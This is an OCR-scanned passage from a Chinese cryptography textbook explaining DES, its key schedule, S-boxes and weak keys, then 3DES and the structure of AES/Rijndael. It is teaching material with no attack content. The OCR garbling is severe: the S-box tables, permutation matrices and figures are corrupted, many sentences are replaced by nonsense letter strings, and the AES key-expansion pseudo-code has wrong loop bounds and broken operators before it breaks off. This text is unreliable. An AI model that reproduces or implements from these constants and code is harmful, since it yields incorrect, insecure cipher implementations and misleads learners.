1973 年 向 社会 公开 征集 一 种 用 于 政府 机 构 和 商业 部 门 对 非 机 密 的 敏感 数据 进行 加 密 的 
加 密 算法 。 许 多 公司 都 提交 了 自己 的 加 密 算法 ， 经 过 评测 ， 最 后 选中 了 IBM 公司 提交 的 
一 种 加 密 算法 。 经 过 一 段 时 间 的 试用 和 征求 意见 , 美国 政府 于 1977 年 1 月 5 日 颁布 作为 
数据 加 密 标准 (Data Encryption Standard, DES). DES 的 设计 目标 是 ， 用 于 加 密 保护 静 
态 存储 和 传输 信道 中 的 数据 ， 安 全 使 用 10~~15 年 。 

DES 综合 运用 了 置换 、 人 代替、 代数 等 多 种 密码 技术 。 它 设计 精巧 、 实 现 容易 、 使 用 
方便 ， 堪 称 是 适应 计算 机 环境 的 近代 传统 密码 的 一 个 典范 。DES 的 设计 充分 体现 了 
Shannon 信息 保密 理论 所 阐述 的 设计 密码 的 思想 ， 标 志 着 密码 的 设计 与 分 析 达 到 了 新 的 
水 平 。 

DES 是 一 种 分 组 密码 。 明 文 、 密 文 和 密 钥 的 分 组 长 度 都 是 64 位 。 

DES 是 面向 二 进 制 的 密码 算法 。 因 而 能 够 加 解密 任何 形式 的 计算 机 数据 。 

DES 是 对 合 运算 ， 因 而 加 密 和 解密 共用 同一 算法 ， 从 而 使 工程 实现 的 工作 量 减 半 。 
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DES 的 整体 结构 如 图 2-2 所 示 。 


初始 置换 IP 


ee as 


Lo 
i 


Li=Ro [Ri =Lo @f CRo, Ki) 


Kı 


q 


| L=R Ry =L, ®f (Ris K) 


Rio = Lis ®f (Ris, Kio) 
yka BP -1 
64 位 密 文 输出 


图 2-2 DES 的 整体 结构 


2.2.2.1 DES 的 加 密 过 程 
A) 64 位 密 钥 经 子 密 钥 产 生 算法 产生 出 16 个 子 密 钥 : Ko Ko es Kio DIES 
一 次 ， 第 二 次 ，…， 第 十 六 次 加 密 迭 代 使 用 
(2) 64 位 明文 首先 经 过 初始 置换 IP (Initial permutation), 将 数据 打 乱 重新 排列 并 分 
成 左右 两 半 。 左 边 32 位 构成 Zo， 右 边 32 位 构成 Roo 


o 


ss 
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(3) 由 加 密 函 数 .实现 子 密 钥 K 对 Ro 的 加 密 ， 结 果 为 32 位 的 数据 组 三 (Re » Kido 
f Ro K)Ħ-S Loti 2 相 加 ， 又 得 到 一 个 32 位 的 数据 组 Lo@f (R, K)o A Loaf (Ro, 
Ki ENA UIE Ri, VA Ro 作 为 第 二 次 加 密 和 迭代 的 五 。 至 此 ， 第 一 次 加 密 迭 代 
结束 。 
(4) URINE ARAL ACA PA Ko oo Kio 进行 ， 其 过 程 
5A URINE IA o 
(5) BANNER a» 产生 一 个 64 位 的 数据 组 。 以 其 左边 32 位 作为 Ri ， 
以 其 右边 32 位 作为 Lie， 两 者 合并 再 经 过 逆 初 始 置 换 耳 ， 将 数据 重新 排列 ， 便 得 到 64 
位 密 文 。 至 此 加 密 过 程 全 部 结束 。 
综 上 可 将 DES 的 加 密 过 程 用 如 下 的 数学 公式 描述 : 
L =R 
R;=L 8 f RK;) (2-12) 
i =1,2,3,---,16 
2.2.2.2 子 密 钥 的 产生 
64 位 密 钥 经 过 置换 选择 1、 循 环 左 移 、 置 换 选 择 2 等 变换 ， 产 生出 16 个 48 位 长 的 
子 密 钥 。 子 密 钥 的 产生 过 程 如 图 2-3 所 示 ， 其 中 产生 每 一 个 子 密 钥 所 需 的 循环 左 移 位 数 
在 表 2-3 中 给 出 。 


oa 
1 
置换 选择 1 

Co Do 
循环 左 移 循环 左 移 

1 i 

Ci D, 

置换 选择 2 =x 

循环 左 移 循环 左 移 

C2 D: 

p jaa | 一 

1 1 

1 1 
循环 左 移 循环 左 移 

Cie Dis 


o T sea 一 


图 2-3 子 密 钥 生产 
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R23 循环 左 移 位 数 表 


和 迭代 次 数 
循环 左 移 位 数 


1. 置换 选择 1 

64 位 的 密 钥 分 为 8 个 字 节 。 每 个 字 节 的 前 7 位 是 真正 的 密 钥 位 , 第 8 位 是 奇偶 校 验 
位 。 奇 偶 校 验 位 可 以 从 前 7 位 密 钥 位 计算 得 出 ， 不 是 随机 的 ， 因 而 不 起 密 钥 的 作用 。 奇 
偶 校 验 位 的 作用 在 于 可 检测 密 钥 中 是 否 有 错误 ， 确 保密 钥 的 完整 性 。 

置换 选择 1 的 作用 有 两 个 : 一 是 从 64 位 密 钥 中 去 掉 8 个 奇偶 校 验 位 ， 二 是 把 其 余 
56 位 密 钥 位 打 乱 重 排 ， 且 将 前 28 位 作为 Co， 后 28 位 作为 pe。 置换 选择 1 规定 : Co 的 
各 位 依次 为 原 密 钥 中 的 第 57，49，…，1，…，44，36 位 ; Do 的 各 位 依次 为 原 密 钥 中 
HISS 63, 55, 0, 7, ee, 12, 4 位。 置换 选择 1 MEER 2-4 中 给 出 。 

2. 置换 选择 2 

将 CG 和 Di 合并 成 一 个 56 位 的 中 间 数 据 ， 置 换 选择 2 从 中 选择 出 一 个 48 位 的 子 密 
HH Ki EMOA 2 的 矩阵 在 图 2-5 中 给 出 ， 其 中 规定 : 子 密 钥 瑟 中 的 1，2，…，48 位 
依 此 是 这 个 56 位 中 间 数 据 中 的 14，17，…，5，3，…，29，32 位 。 


G Ds 141711241 5 

3 28.15 6 2110 

231912 4 268 

57 49 41 33 25 17 9 63 55 47 3931 23 15 16 7 272013 2 
1 58 50 42 34 26 18 7 6254 4638 30 22 41 52 31374755 
10 2 59 51 43 35 27 14 6 6153 45 37 29 30 40 51 45 33 48 
19 11 3 60 52 44 36 21 13 52820 12 4 44 49 39 56 34 53 
46 42 50 36 29 32 
图 2-4 置换 选择 1 图 2-5 置换 选择 2 


2.2.2.3 ”初始 置换 IP 
初始 置换 IP 是 DES 的 第 一 步 密码 变换 。 初 始 置换 

的 作用 在 于 将 64 位 明文 打 乱 重 排 ， 并 分 成 左右 两 半 。 58 50 42 34 26 18 10 
左边 32 位 作为 ze， 右边 32 位 作为 Ro， 供 后 面 的 加 密 | SS 4 Ge 50 on a 
迭代 使 用 。 初始 置换 IP 的 矩阵 在 图 2-6 中 给 出 。 其 置换 | 64 56 48 40 32 24 16 
矩阵 说 明 : 置换 后 64 位 数据 的 1，2，…，64 位 依次 是 | 8 入 半生 Oe 
原 明文 数据 的 58，50，…，2，60，…，15，7 各 位 。 61 53 45 37 29 21 13 
2.2.2.4 WEARS 63 55 47 39 31 23 15 


加 密 函 数 f 是 DES 的 核心 部 分 。 如 图 2-7 所 示 ， 加 图 2-6 初始 置换 人 P 


ww 一 oem 


Ei 


ot 
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密 函 数 了 由 选择 运算 EE， 代替 函数 组 S 和 置换 运算 P 组 成 。 


32 位 输入 4 


1 
选择 运算 EE 


置换 运算 己 
1 
输出 f(A, K,) 
图 2-7 WERKS 
1. 选择 运算 EE 
选择 运算 对 32 位 的 数据 组 4 的 各 位 进行 选择 和 排列 ， 
产生 一 个 48 位 的 结果 。 这 说 明 选 择 运 算是 一 种 扩展 运算 ， : 3 
它 将 32 位 的 数据 扩展 为 48 位 的 数据 ， 以 便 与 48 位 的 子 密 钥 | 8 9 io 11 12 13 
模 2 相 加 并 满足 选择 函数 组 S 对 数据 长 度 的 要 求 。 由 选择 运算 | 12 13 14 15 16 17 
矩阵 可 知 , 它 是 通过 重复 选择 某 些 数据 位 来 达到 数据 扩展 的 目 | 2 OT 1 20 2 
的 。 选 择 运算 互 的 矩阵 如 图 2-8 所 示 。 A E 
2. 代替 函数 组 S 28 29 30 31 32 1 


代替 函数 组 由 8 个 代替 函数 〈 也 称 8 盒子 ) 组 成 ，8 个 8 

ANIA, Si, S2 Sz, Sa, Ss, Seo Sr, Sao (iF RZA 图 2-8 选择 运算 EE 

输入 是 一 个 48 位 的 数据 ， 从 第 1 位 到 第 48 位 依 此 加 到 8 个 S 盒 的 输入 端 。 每 个 S 傅 有 
一 个 选择 和 矩阵， 规定 了 其 输出 与 输入 的 选择 规则 。 选 择 矩 阵 有 4 行 16 列 ， 每 行 都 是 0 
到 15 这 16 个 数字 ， 但 每 行 的 数字 排列 都 不 同 ， 而 且 8 个 选择 矩阵 彼此 也 不 同 。 每 个 8 
AA 6 位 输入 ， 产 生 4 位 的 输出 。 选 择 规则 是 : 5S 盒 的 6 位 输入 中 的 第 1 位 和 第 6 位 数 
字 组 成 的 二 进 制 数值 代表 选中 的 行 号 ， 其 余 4 位 数字 所 组 成 的 二 进 制 数值 代表 选中 的 列 
号 , 而 处 在 被 选中 的 行 号 和 列 号 交点 处 的 数字 便 是 5 盒 的 输出 〈 以 二 进 制 形式 输出 )。 以 


Si 为 例 ， 设 输入 为 101011， 第 1 位 和 第 6 位 数字 组 成 的 二 进 制 数 为 11= (3)1o， 表 示 选 
中 51 的 行 号 为 3 的 那 一 行 ， 其余 4 位 数字 所 组 成 的 二 进 制 数 为 0101= (5)10o， 表 示 选 中 
Si 的 列 号 为 5 的 那 一 列 。 交 点 处 的 数字 是 9， 则 Sy 的 输出 为 1001。S 盒 的 选择 矩阵 S 到 
Ss 由 表 2-4 给 出 


Do 
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表 2-4 代替 函数 组 
0 2 3 5 6 7 8&8 9 BU 2 DBD 
0714 4 #13 1 2 D un 8 3 10 © 2D 3S 9 OO F 
Io Bb 7 4 4 2 BB 1°10 6 2H & 5 3 8 
2) 4 E 8 3B 2 WW BR 7 3 10 5 0 
3,15 12 8 2 4 7 5 Hi 14 10 0 6 13 


0 
1 
2 
3 

0 1 2 3 4 -353 6 7 8 9 10 H 12 13 14 
0;10 0 9 6 3 15 5 Le? 8 7 W 4 2 
1B 7 06 9 3 4 6 10 2 8 5 4 122 1 15 
2/36 «4 FS 8 & 3 OF 1 2 R 5 10 M 
3/2 10 BO 6 9 8 7 4 #15 14 3 UU 5 2 

0 1 2 3 4 5 6 2 8 9 120 U DPD 0 H 
9/7 BG 4 3 0 6 9 10 1 2 8 SHB 4 
1B Sn s 6o 3 4 T 2 2 t Mu 
2b -6 9 orn 7 Be- 3 H 3 2 8 
3/3 5 0 6 10 1 B 8 有 2 

0 1 2 3 4 5 6 7 e 9 10 Ht DD 3 4 1 
0; 2 R 4 1 7 #10 H 6 8 2: 3 b Bb O 9 
IM U 2 12 4 7 B 2 > 0 5 10 32 9 8 6 
2); 4 2 Lt O Bo 7 & DB 9 WS 6 3 0 14 
311 8 12 7 1 4 2 13 6 15 0 9 10 4 5 3 

0 1 2 3 4 5 6&6 7 § 9 10 FP DD unn 
oR fF 0. 9 2 é 8S O bb F 4 WT 5s 
1/10 3 4+4 2° 5 6 18 4 6 Wt 3 8 
Zi S 上 G FJ 2 $ B 3 7 0 4 10 1 B H 6 
3,4 3 2 DB S 3S B 10 ww 1 7 和 8 B 


Sy 


S3 


S4 


Ss 


Se 


8 
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5 6 
04 HW 2 4 0 8 3 3 12 9 7 5 10 6 1 
1/13 0 N 7 4 9 1 10 14 3 3 2 2 DB 8 6 Sy 
2] 1 uH B 42. 3 7 14 10 15 6 8 0 5 9 2 
316 2 B 8 1 4 10 7 9 5 0 15 14 2 3 12 


0 1 2 3 4 5 6 7 8 9 0 HW RP BHD 
oB 2 8 4 6 15 Ik 1 10 9 3 4 5 O 12 7 
ij G Bs 0 3 F ERS 6&2 HH OO WY 2 Sg 
2|7 1 L 9 2 4 2 0 6 1 13 3 8 
3 | 2 IO 4 20 8 Bw OD DS 0-7 5 6 n 


S 盒 是 DES 保密 性 的 关键 所 在 。 它 是 一 种 非 线 性 变换 ， 也 是 DSE 中 唯一 的 非 线性 
运算 。 如 果 没 有 它 ， 整 个 DES 将 成 为 一 种 线性 变换 ， 这 将 是 不 安全 的 。 关 于 S 盒 的 设计 
细节 ，IBM 公司 和 美国 国家 保密 局 (NSA) 至 今 尚未 完全 公布 。 研 究 表 明 ，$ 盒 至 少 应 
满足 以 下 准则 ; 

(1) 输出 不 是 输入 的 线性 和 仿 射 函数 ; 

(2) 任意 改变 输入 中 的 一 位 ， 输 出 至 少 有 两 位 发 生变 化 ; 

(3) 对 于 任何 5S 盒 和 任何 输入 x，S(x) 和 S(x @ 001100) 至 少 有 两 位 不 同 ， 这 里 x 是 一 
个 6 位 的 二 进 制 串 ; 

(4) 对 于 任何 § 盒 和 任何 输入 x， 以 及 yzEGF(2)，S(x)#S(x@ 11yz00)， 这 里 x 是 一 
个 6 位 的 二 进 制 串 ; 

(5) 保持 输入 中 的 1 位 不 变 ， 其 余 5 位 变化 ， 输 出 中 的 0 和 1 的 个 数 接近 相等 。 

随 着 对 DES 研究 的 深入 ， 人 们 发 现 ， 除 了 以 上 五 条 准则 外 ，$ 盒 还 必须 满足 抗 差 分 
攻击 的 要 求 。 人 们 猜测 ，IBM 公司 和 美国 国家 保密 局 NSA) 至 今 尚 未 公布 的 关键 细节 
就 在 于 此 。 在 我 们 对 DES 的 研究 中 也 证 明了 这 一 点 ， 研 究 表明 DES 的 S 盒 的 抗 差分 能 
力 很 强 ， 这 说 明 设计 者 在 当时 已 经 掌握 了 抗 差分 攻击 的 设计 方法 ， 而 他 们 不 想 让 外 人 知 
道 差分 攻击 技术 ， 便 不 公布 这 一 设计 准则 。 
根据 香农 用 混淆 和 扩散 设计 密码 的 理论 ，DES 的 S 盒 用 来 提供 混淆 ,而 P 置换 用 来 
提供 扩散 。 

3. 置换 运算 P 

置换 运算 尸 把 8 盒 输出 的 32 位 数据 打 乱 重 排 ， 得 到 32 位 的 加 密 函 数 输出 。 用 尸 置 
换 来 提供 扩散 ,把 8 盒 的 混淆 作用 扩散 开 来 。 正 是 置换 尸 与 8 盒 的 互相 配合 提高 了 DES 
的 安全 性 。 置 换 矩 阵 己 如 图 2-9 所 示 。 
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2.2.2.S” 逆 初始 置换 P7 
逆 初 始 置 换 P 是 初始 置换 IP 的 逆 置换 。 它 把 第 十 六 次 加 密 和 欠 代 的 结果 打 乱 重 排 ， 
形成 64 位 密 文 。 至 此 ， 加 密 过 程 完 全 结束 。 逆 初始 置换 的 置换 矩阵 如 图 2-10 所 示 。 


图 2-9 置换 运算 书 图 2-10 首 初 始 置换 IP 


初始 置换 IP 和 道 初始 置换 IP 的 密码 意义 不 大 ， 因 为 卫 AIP 没有 密 钥 参 与 ， 
而 且 在 其 置换 矩阵 公开 的 情况 下 求 出 男 一 个 是 很 容易 的 。 了 的 主要 作用 是 把 输入 数据 打 
乱 重 排 ， 以 打 乱 原始 输入 数据 的 原 有 格式 。 因 为 使 用 了 IP， 所 以 必须 使 用 IP 一 ， 以 确保 
加 密 算法 的 可 逆 性 和 对 合 性 。 
2.2.2.6 DES 的 解密 过 程 
由 于 DES 的 运算 是 对 和 运算 , 所 以 解密 和 加 密 可 共用 同一 个 运算 , 只 是 子 密 钥 使 用 
的 顺序 不 同 。 
把 64 位 密 文 当 作 明文 输入 ， 而 且 第 一 次 解密 迭代 使 用 子 密 钥 Kio BRERA 
使 用 子 密 钥 Ks，…， 第 十 六 次 解密 欠 代 使 用 子 密 钥 天， 最 后 的 输出 便 是 64 位 明文 。 
解密 过 程 可 用 如 下 的 数学 公式 描述 : 
R= L, 
DR ® f(L,-K;) (2-13) 
i=16,15,14,---,1 
2.2.2.7 DES 的 安全 性 
儿 十 年 来 的 应 用 实践 证 明了 DES 作为 商用 密码 , 用 于 其 设计 目标 是 安全 的 。 在 这 期 
间 , 除了 密 钥 太 短 经 不 起 当今 网 络 计 算 和 并 行 计算 的 穷 举 攻击 外 , 没有 发 现 DES 存在 其 
他 严重 的 安全 缺陷 。 它 在 世界 范围 内 得 到 广泛 应 用 ， 为 确保 信息 安全 作出 了 不 可 磨灭 的 
DES 在 总 的 方面 是 极其 成 功 的 ， 但 同时 也 不 可 避免 地 存在 着 一 些 弱 点 和 不 足 。 
1， 密 钥 较 短 
面 对 计 算 能 力 高 速 发 展 的 形势 ，DES 采用 56 位 密 钥 ， 显 然 短 了 一 些 。 如 果 密 钥 的 
长 度 再 长 一 些 ， 将 会 更 安全 。 
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2. 存在 弱 密 钥 
DES 存在 一 些 弱 密 钥 和 半 弱 密 钥 。 在 16 次 加 密 迭 代 中 分 别 使 用 不 同 的 子 密 钥 是 确 
保 DES 安全 强度 的 一 种 重要 措施 。 但 是 实际 上 却 存在 着 一 些 密 钥 ， 由 它们 产生 的 16 个 
子 密 钥 不 是 互 不 相同 ， 而 是 有 相 重 的 。 
设 大 是 给 定 的 密 钥 ， 如 果 由 大 所 产生 的 子 密 钥 ; 
ki =k == = kie 
则 称 大 为 弱 密 铀 。 如 果 大 为 弱 密 铀 ， 则 有 
DES (DES (M, k), k) =M 
DES" (DES™ (M, k), k) =M 
DES (M, k) =DES™ (M, k) (2-14) 


2.2.2.8 = DES 

美国 NIST 在 1999 年 发 布 了 一 个 新 版 本 的 DES 标准 (FIPS PUB46-3)， 该 标准 指 
出 DES 仅 能 用 于 遗留 的 系统 ， 同 时 3DES 将 取代 DES 成 为 新 的 标准 。 在 此 之 后 ， 一 些 
国际 标准 也 都 支持 3DES。 在 国内 , 中 国人 民 银 行 的 智能 卡 技术 规范 也 支持 3DES。 总 之 ， 
目前 在 国内 外 3DES 都 还 有 着 广泛 的 应 用 。 

3DES 有 三 个 显著 的 优点 。 首 先 它 的 密 钥 长 度 是 168 位 ， 完 全 能 够 抵抗 穷 举 攻击 。 
其 次 是 相当 安全 ， 而 且 经 过 实践 检验 。 这 是 因为 3DES 的 底层 加 密 算法 与 DES 相同 ， 该 
加 密 算法 比 任何 其 他 加 密 算法 受到 分 析 的 时 间 都 要 长 ， 没 有 发 现 有 比 穷 举 攻击 更 有 效 的 
攻击 方法 ， 因 此 相当 安全 。 如 果 仅 考虑 算法 安全 ，3DES 能 成 为 未 来 数 十 年 加 密 算法 标 
准 的 合适 选择 。 其 三 ， 由 于 3DES 的 底层 加 密 算法 与 DES 相同 ， 所 以 许多 现 有 的 DES 
软 硬 件 产品 都 能 方便 地 实现 3DES， 因 此 使 用 方便 。 3DES 的 根本 缺点 在 于 用 软件 实现 该 
算法 的 速度 比较 慢 。 

3DES 即 可 以 使 用 三 个 密 钥 ， 也 可 以 使 用 两 个 密 钥 。 图 2-11 给 出 了 一 种 两 个 密 钥 的 
3DES 结构 。 


M -1 C 
| DES DES =| DES 
al pae 
| Kı le lz 
(a) 3DES 加 密 
C | pesi | | pes =| Des! M_ 
| Ki lz | Kı 
(b) 3DES 解 密 


图 2-11 3DES 加 解密 
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2.2.3 AES 算法 


美国 政府 于 1997 年 又 开始 公开 征集 新 的 数据 加 密 标 准 算法 AES， 以 取代 1998 年 底 
废止 的 DES。 经 过 三 轮 筛选 ， 2000 年 10 月 2 日 美国 政府 正式 宣布 选中 比利时 密码 学 家 
Joan Daemen 和 Vincent Rijmen 提出 的 一 种 密码 算法 RIINDAEL 作为 AES。2001 年 11 
月 26 日 ， 美 国政 府 正式 颁布 AES 为 美国 国家 标准 〈 编 号 为 FIST PUBS 197)。 这 是 密码 
史上 的 又 一 个 重要 事件 , 世界 各 国都 高 度 重视 这 一 事件 。 目前 AES 已 经 被 一 些 国 际 标准 
化 组 织 (ISO，IETF，IEEE802.11 等 ) 采纳 作为 标准 。RIJNDAEL 算法 之 所 以 能 够 最 终 
被 选 为 AES 的 原因 是 其 安全 、 性 能 好 、 效 率 高 、 实 用 、 灵 活 。 

RIJNDAEL 算法 是 一 个 数据 块 长 度 和 密 钥 长 度 都 可 变 的 分 组 加 密 算法 ， 其 数据 块 长 
度 和 密 钥 长 度 都 可 独立 地 选 定 为 大 于 等 于 128 位 且 小 于 等 于 256 位 的 32 位 的 任意 倍数 。 
而 美国 颁布 AES 时 却 规定 数据 块 的 长 度 为 128 位 、 密 钥 的 长 度 可 分 别 选 择 为 128 位 , 192 
位 或 256 位 。 

RIJNDAEL 算法 仍然 采用 分 组 密码 的 一 种 通用 结构 : 对 轮 函 数 实 施 迭 代 的 结构 。 只 
是 轮 函数 结构 采用 的 是 代替 /置换 网 络 结构 (SP 结构 )， 没 有 采用 DES 的 Feistel 结构 。 
如 图 2-12 所 示 ，RIJNDAEL 的 轮 函数 由 以 下 三 层 组 成 。 


H x 


一 | ”初始 圈 密 钥 加 


用 户 密 钥 


图 2-12 RUNDAEL 算法 结构 


a) 非 线性 层 : 进行 非 线 性 S AER ByteSub, H 16 个 S 盒 并 置 而 成 ， 起 混淆 的 
作用 。 
(2) 线性 混合 层 : 进行 行 移 位 变换 ShiftRow 和 列 混合 变换 MixColumn 以 确保 多 圈 


N 


aE 
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之 上 的 高 度 扩散 。 

(3) 密 钥 加 层 : 进行 圈 密 钥 加 变换 AddRoundKey, 将 圈 密 钥 简 单 地 异 或 到 中 间 状 态 
上 ， 实 现 密 钥 的 加 密 控制 作用 。 
2.2.3.1 ”状态 
在 RUNDAEL 算法 中 , 加 解密 要 经 过 多 次 数据 变换 操作 ,每 一 次 变换 操作 产生 一 个 
中 间 结 果 ， 称 这 个 中 间 结 果 叫 做 状态 。 各 种 不 同 的 密码 变换 都 是 对 状态 进行 的 。 

把 状态 表示 为 二 维 字 节 数 组 〈 每 个 元 素 为 一 个 字 节 )， 它 有 四 行 ，Nb 列 。Nb 等 于 数 
据 块 长 度 除 以 32。 数 据 块 长 度 为 128 时 ，Nb=4。 数 据 块 长 度 为 192 时 ，Nb=6。 数 据 块 
长 度 为 256 时 ，Nb=8。 因 为 状态 数组 有 四 行 ， 每 个 元 素 为 一 个 字 节 ， 所 以 状态 的 每 列 便 
为 一 个 四 字 节 的 字 。 有 些 密码 变换 是 对 字 节 进行 的 ， 有 些 密码 变换 是 对 字 进 行 的 。 

例如 ， 数 据 块 长 度 为 128 的 状态 如 表 2-5 所 示 。 


表 2-5 数据 块 长 度 为 128 的 状态 


在 进行 加 密 处 理 时 ， 数 据 块 按 列 优先 的 顺序 写 入 状态 ， 即 按 aoo airos azo a30 
Aoi» A119 A21% 431» A02% A12% A22» A32» A03» A13» A23» a33 的 顺序 写 入 状态 中 。 在 加 
密 操 作 结束 时 ， 密 文 按 同样 的 顺序 从 状态 中 取出 。 

类 似 地 ， 密 钥 也 可 表示 为 二 维 字 节 数组 (每 个 元 素 为 一 个 字 节 ), 它 有 四 行 ，Nk 列 。 
Nk 等 于 密 钥 块 长 度 除 32。 密 钥 长 度 为 128 的 二 维 字 节 数组 如 表 2-6 所 示 。 密 钥 也 是 按 
列 优先 的 顺序 存储 到 密 钥 二 维 字 节 数组 中 ， 即 按 koo kio Kao» kaos kop Kaas kzi Kaas 
koz» kiz» k22; k32, koss kiss koa, ksa 的 顺序 存储 到 密 钥 二 维 字 节 数 组 中 。 


R26 BAKEA 128 的 密 钥 二 维 字 节 数组 


RIJNDAEL 算法 的 迭代 圈 数 Nr 由 Nb 和 Nk 共同 决定 ， 具 体 取 值 列 在 表 2-7 中 。 
表 2-7 算法 迭代 圈 数 Nr 
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2.2.3.2” 轮 函数 
RIJNDAEL 加 密 算法 的 轮 函 数 采用 代替 /置换 网 络 结构 (SP 结构 )， 由 S 盒 变 换 
ByteSub、 行 移 位 变换 ShiftRow、 列 混合 变换 MixColumn、 轿 密 钥 加 变换 AddRoundKey 
组 成 。 用 伪 c 语言 可 写 为 : 
Round (State, RoundKey) 
{ ByteSubl(State); 
ShiftRow (State); 
MixColumn (State); 
AddRoundKey (State, RoundKey); } 


加 密 算法 中 的 最 后 一 圈 的 轮 函数 与 上 面 的 标准 轮 函数 略 有 不 同 。 定 义 如 下 : 


FinalRound (State, RoundKey) 
{ ByteSub (State); 
ShiftRow (State) ; 
AddRoundKey (State,RoundKey); } 


容易 看 出 ， 最 后 一 圈 的 轮 函数 与 标准 轮 函 数 相 比 ， 去 掉 了 列 混合 变换 MixColumn 
(State). 

1. SABER ByteSub 

ByteSub 变换 是 按 字 节 进行 的 代替 变换 ， 也 称 为 S 盒 变换 。 它 是 作用 在 状态 中 每 个 
字 节 上 的 一 种 非 线性 字 节 变换 。 这 个 变换 REK S box) 按 以 下 两 步 进行 

© 把 字 节 的 值 用 它 的 乘法 逆 来 代替 ， 其 中 00" 的 逆 就 是 它 自己 。 

@ 经 1 处 理 后 的 字 节 值 再 进行 如 下 定义 的 仿 射 变换 : 


y) (10001111) (%) (1 
» | |11000111| |x] |1 
yı | |11100011| |x| |o 
» |11110001] f} j0 Ga 
y, | |11111000| |x| |0 
y, | |01111100) |x; | |1 
yl (00111110 [x| |1 
y,} 00011111) (x) lo 


值得 注意 的 是 : 

(1) S 盒 变换 的 第 一 步 是 把 字 节 的 值 用 它 的 乘法 逆 来 代替 ， 是 一 种 非 线 性 变换 。 

(2) 由 于 式 (2-15) 的 系数 矩阵 中 每 列 都 含有 5 个 1， 这 说 明 改 变 输入 中 的 任意 一 
位 ， 将 影响 输出 中 的 5 位 发 生变 化 。 

G) 由 于 式 (2-15) 的 系数 矩阵 中 每 行 都 含有 5 个 1， 这 说 明 输 出 中 的 每 一 位 ， 都 


a: Be 


国医 
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与 输入 中 的 5 位 相关 。 

(4) ByteSub 变换 就 相当 于 DES 中 得 8 盒子 。 它 为 加 密 算法 提供 非 线性 ， 是 决定 加 
密 算 法 安全 性 的 关键 。 它 是 一 种 8 位 输入 、8 位 输出 的 非 线性 变换 。 

为 了 确保 加 密 算 法 是 可 逆 的 ， 如 上 定义 的 ByteSub 变换 必须 是 可 逆 的 。 

2. 行 移 位 变换 ShiftRow 

ShiftRow 变换 是 对 状态 的 行进 行 循环 移 位 变换 。 在 ShiftRow 变换 中 , 状态 的 后 三 行 
以 不 同 的 移 位 值 循环 “ 左 ” 移 。 第 0 行 不 移 位 ， 第 1 行 移 Cl 字 节 ， 第 2 行 移 C2 字 节 ， 
第 3 行 移 C3 字 节 。 

移 位 值 C1，C2 和 C3 与 Nb 有关， 具体 列 在 2-8 HH: 


R28 移 位 值 
Nb C3 
4 3 
6 3 
8 4 


3. 列 混合 变换 MixColumn 

MixColumn 变换 是 对 状态 的 列 进行 混合 变换 。 在 MixColumn 变换 中 ， 把 状态 中 的 
每 一 列 看 作 GF(2*) 上 的 多 项 式 ， 并 与 一 个 固定 多 项 式 c(x) 相 乘 然 后 模 多 项 式 x*+1， 其 
中 cQ) A: 

(x) =‘03 x? +01’ x? +‘O1x’ +02 (2-16) 

因为 co 与 x+l 是 互 素 的 ， 从 而 保证 c(x) 存 在 逆 多 项 式 dex), mi c(x)d(x)=1 mod 
x+1。 只 有 道 多 项 式 d(x) 存 在 ， 才 能 正确 进行 解密 。 

4. 图 密 钥 加 变换 AddRoundKey 

AddRoundKey 变换 是 利用 圈 密 钥 对 状态 进行 模 2 相 加 的 变换 。 在 这 个 操作 中 ， 圈 密 
钥 被 简单 地 异 或 到 状态 中 去 。 圈 密 钥 根 据 圈 密 钥 产生 算法 通过 密 钥 得 到 。 圈 密 钥 长 度 等 
于 数据 块 长 度 。 
2.2.3.3 圈 密 钥 产生 算法 

圈 密 钥 根 据 圈 密 钥 产生 算法 由 用 户 密 钥 产生 得 到 。 圈 密 钥 产生 分 两 步 进行 : 密 钥 扩 
展 和 圈 密 钥 选 择 ， 且 遵循 以 下 原则 。 

(1) 圈 密 钥 的 比特 总 数 为 数据 块 长 度 与 圈 数 加 1 的 积 。 例 如 ， 对 于 128 位 的 分 组 长 
度 和 10 圈 迭 代 ， 圈 密 钥 的 总 长 度 为 128(10+1)=1408 位 。 

(2) 首先 将 用 户 密 钥 扩展 为 一 个 扩展 密 钥 。 

G) 再 从 扩展 密 钥 中 选 出 圈 密 钥 : 第 一 个 圈 密 钥 由 扩展 密 钥 中 的 前 Nb 个 字 组 成 ， 
第 二 个 圈 密 钥 由 接 下 来 的 Nb 个 字 组 成 ， 以 此 类 推 。 
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1， 密 钥 扩 展 

用 一 个 字 (四 个 字 节 ) 元 素 的 一 维 数组 W[Nb*(Nr+1)] 存 储 扩展 密 钥 。 用 户 密 钥 包 含 
在 数组 W 最 开始 的 Nk 个 字 中 ， 其 他 的 字 由 它 前 面 的 字 经 过 处 理 后 得 到 。 有 Nk 小 于 等 
于 6 和 Nk 大 于 6 两 种 密 钥 扩展 策略 。 

(1) 对 于 Nk<6， 有 下 面 密 钥 扩展 策略 : 

符号 说 明 : CipherKey 表示 用 户 的 密 钥 , 它 是 一 个 有 Nk 个 密 钥 字 的 一 维 数组 。W 为 
存储 扩展 密 钥 的 一 维 数组 。 


KeyExpansion (CipherKey, W) 
{ For(I=0; I<Nk; I++) W[I] = CipherKey[I]; 
For (I=0; I< Nb* (Nr+1); I++) 
{Temp=W[I-1]; 
IF (ISNk= =0) 
Temp=SubByte (Rot1l (Temp) “*Rcon[I/Nk]); 
W[I]=W[I-Nk] “Temp; 
} 
} 


可 以 看 出 ， 最 前 面 的 Nk 个 字 是 由 用 户 密 钥 填 充 的 。 这 之 后 的 每 一 个 字 W 加 等 于 前 
面 的 字 W[I-1] 与 Nk 个 位 置 之 前 的 字 W[I-NK] 的 异 或 。 如果 I 是 Nk 的 整数 倍 ， 在 异 或 之 
前 ， 要 先 对 W[I-1] 进 行 Rotl 变换 和 ByteSub 变换 ， 再 异 或 一 个 圈 常 数 Reon 。 

其 中 ,Rotl 是 对 一 个 字 里 的 字 节 以 字 节 为 单位 进行 循环 移 位 的 函数 , 设 W= (A, B, 
C, D), 则 Rotl (W) = (B, C, D, A). 

圈 常 数 Reon 与 Nk 无 关 ， 且 定义 为 : 

Reon[i] = (RC[i],'00','00','00') 

RC[0] = '01' 

RC[i] = xtime(RC[i-1]) 


(2) 对 于 Nk>6， 有 下 面 的 密 钥 扩展 策略 : 


KeyExpansion (CipherKey, W) 
{ For(I=0; I<Nk; I++) W[I] = CipherKey[I]; 
For (I=0; I< Nb* (Nr+1); I++) 
{Temp=W[I-1]; 
IF (ISNk= =0) 
Temp=SubByte (Rot1 (Temp) “Rcon[I/Nk]); 
ELSE IF(ISNk= =4) 
Temp=SubByte (Temp) ; 
W[IJ=W[I-Nk] “Temp; 


a> mn 


